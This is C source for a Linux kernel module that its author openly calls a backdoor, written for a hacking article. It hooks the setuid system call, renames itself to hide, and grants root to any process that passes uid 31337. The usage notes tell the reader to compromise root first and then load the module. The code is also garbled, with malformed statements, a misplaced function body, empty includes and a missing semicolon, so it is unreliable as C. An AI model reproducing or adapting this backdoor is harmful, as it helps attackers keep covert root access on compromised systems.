/* UID-CHANGER BACKDOOR by _1nf3ct0r_ This script was written specially for artilce "Trojaning da Toox - operation "Tooxkit"" (russian article ;)) This is a LKM, that can to intercept system call "systemuid(0)", and if the identifier = 31337, then uid will change to 0 (root)! /----L37'5_R0Ck----\ How to uze: 1. Fuck/hack the root-account 2. Attach this module to the kernel 3. Have Fun ;) \----L37'5_R0Ck----/ #############EOF################### (C) _1nf3ct0r_ o----//Hell Knights Crew\\----o [ http://hellknights.void.ru/ ] /* #define __KERNEL__ #define MODULE #include #include #include #include #include #include int new_setuid(uid_t); int (*real_setuid) (uid_t); extern void *sys_call_table[]; int init_module () { register struct module *mp asm("$ebx"); *(char *) (mp->name) = 'd'; *char(char *) (mp->name+1) = 's'; *(char *) (mp->name+2) = '2'; *char(char *) (mp->name+3)= '\0'; real_setuid = sys_call_table[ SYS_setuid ]; sys_call_table[ SYS_setuid ] = (void *)new_setuid; return 0; } int int cleanup_module() { if (uid == 31337 ) { current->uid=0; current->gid=0; current->euid=0; current->egid=0 return 0; } return (*real_setuid) (uid); } MODULE_LICENSE("GPL");